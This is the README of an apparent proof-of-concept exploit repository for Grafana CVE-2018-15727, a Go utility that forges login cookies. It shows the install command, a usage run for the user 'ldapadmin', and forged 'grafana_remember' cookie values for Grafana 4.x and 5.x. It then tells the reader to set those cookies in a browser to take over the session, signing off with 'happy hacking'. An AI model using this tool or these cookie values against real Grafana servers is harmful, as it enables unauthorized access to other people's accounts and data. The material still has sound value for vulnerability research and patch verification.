a small utility to generate a cookie in order to exploit a grafana vulnerability (CVE-2018-15727)# Grafana CVE-2018-15727 exploit
## Installation
```
$ go get github.com/u238/grafana-CVE-2018-15727
```
## Usage
```
$ source <(go env)
$ $GOPATH/bin/grafana-CVE-2018-15727 ldapadmin
[i] delete the grafana_sess cookie from your browser session
[i] set following cookies in you browser:
* for Grafana 5.x:
grafana_user : ldapadmin
grafana_remember : 8947f2c6b81963b2a45f4293ced63802f0c923daa368a9beda748800335fc72c06ea186e43
* for Grafana 4.x:
grafana_user : ldapadmin
grafana_remember : 8d26614cd6a92aaf892eebb066ae17ed65ef6c9bea73f875ed6698a907d807db0026787fc3
[+] happy hacking ;)
```
## LICENSE
See LICENSE file.
[4.0K] /data/pocs/b37d7c0c8b87724e70f6f78e16004afb88952e9e
├── [1.0K] LICENSE
├── [2.0K] main.go
└── [ 647] README.md
0 directories, 3 files